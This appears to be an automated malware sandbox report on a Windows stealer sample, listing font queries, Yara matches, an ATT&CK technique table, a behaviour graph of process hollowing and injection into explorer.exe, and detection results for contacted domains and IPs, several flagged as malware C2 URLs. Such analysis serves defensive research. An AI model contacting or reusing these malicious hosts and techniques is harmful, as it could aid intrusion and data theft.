          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.3e4c0b8.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.3e4c0b8.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules
          Path Interception512
          Process Injection
          1
          Rootkit
          1
          Credential API Hooking
          121
          Security Software Discovery
          Remote Services1
          Credential API Hooking
          Exfiltration Over Other Network Medium12
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Masquerading
          LSASS Memory2
          Process Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          Exfiltration Over Bluetooth3
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Disable or Modify Tools
          Security Account Manager31
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)31
          Virtualization/Sandbox Evasion
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer14
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script512
          Process Injection
          LSA Secrets1
          Remote System Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Deobfuscate/Decode Files or Information
          Cached Domain Credentials112
          System Information Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items4
          Obfuscated Files or Information
          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job3
          Software Packing
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 810265 Sample: SecuriteInfo.com.Win32.Malw... Startdate: 16/02/2023 Architecture: WINDOWS Score: 100 34 www.couldskuathink.com 2->34 42 Snort IDS alert for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 5 other signatures 2->48 11 SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe 3 2->11         started        signatures3 process4 file5 32 SecuriteInfo.com.W...19132.11695.exe.log, ASCII 11->32 dropped 14 MSBuild.exe 11->14         started        17 MSBuild.exe 11->17         started        19 MSBuild.exe 11->19         started        process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 21 explorer.exe 1 14->21 injected 66 Tries to detect virtualization through RDTSC time measurements 17->66 process8 dnsIp9 36 www.hblcfl.com 156.242.168.70, 49709, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 21->36 38 www.desipizza.uk 213.171.195.105, 49711, 80 ONEANDONE-ASBrauerstrasse48DE United Kingdom 21->38 40 www.anbietertest.com 45.195.140.44, 49707, 80 COMING-ASABCDEGROUPCOMPANYLIMITEDHK Seychelles 21->40 50 System process connects to network (likely due to code injection or exploit) 21->50 25 cmmon32.exe 21->25         started        signatures10 process11 signatures12 52 Modifies the context of a thread in another process (thread injection) 25->52 54 Maps a DLL or memory area into another process 25->54 56 Tries to detect virtualization through RDTSC time measurements 25->56 28 cmd.exe 1 25->28         started        process13 process14 30 conhost.exe 28->30         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe15%ReversingLabsWin32.Trojan.Generic
          SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe37%VirustotalBrowse
          SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe100%Joe Sandbox ML
          No Antivirus matches
          SourceDetectionScannerLabelLinkDownload
          3.2.MSBuild.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.anbietertest.comReferer:0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.desipizza.uk/p25s/www.couldskuathink.com0%Avira URL Cloudsafe
          http://www.desipizza.uk/p25s/0%Avira URL Cloudsafe
          http://www.blueskyinteractives.co.uk0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.iqd964.com0%Avira URL Cloudsafe
          http://www.couldskuathink.com/p25s/0%Avira URL Cloudsafe
          http://www.jdyokum.com0%Avira URL Cloudsafe
          http://www.iqd964.com/p25s/100%Avira URL Cloudmalware
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.desipizza.uk/p25s/?T6AhrZK=Ph2/VWOiWysesScqmGnEABkQXxW9tNK0oaQwIZbckmwGK9MQJoSsZuxrXVYCsjKEmA2B&W2MXm=JzuDhNAPN40%Avira URL Cloudsafe
          http://www.allsttk.comReferer:0%Avira URL Cloudsafe
          http://www.katkisiz.info/p25s/www.32612.xyz0%Avira URL Cloudsafe
          http://www.tjhymzz.com/p25s/0%Avira URL Cloudsafe
          http://www.katkisiz.info0%Avira URL Cloudsafe
          http://www.iftar.rsvp/p25s/0%Avira URL Cloudsafe
          http://www.couldskuathink.com0%Avira URL Cloudsafe
          http://www.associazionefaber.com/p25s/0%Avira URL Cloudsafe
          http://www.hblcfl.com0%Avira URL Cloudsafe
          http://www.hblcfl.com/p25s/www.desipizza.uk0%Avira URL Cloudsafe
          www.fliparcher.store/p25s/100%Avira URL Cloudmalware
          http://www.tjhymzz.comReferer:0%Avira URL Cloudsafe
          http://www.32612.xyz/p25s/100%Avira URL Cloudmalware
          http://www.jdyokum.com/p25s/100%Avira URL Cloudmalware
          http://www.fliparcher.store/p25s/www.pfokn.online100%Avira URL Cloudmalware
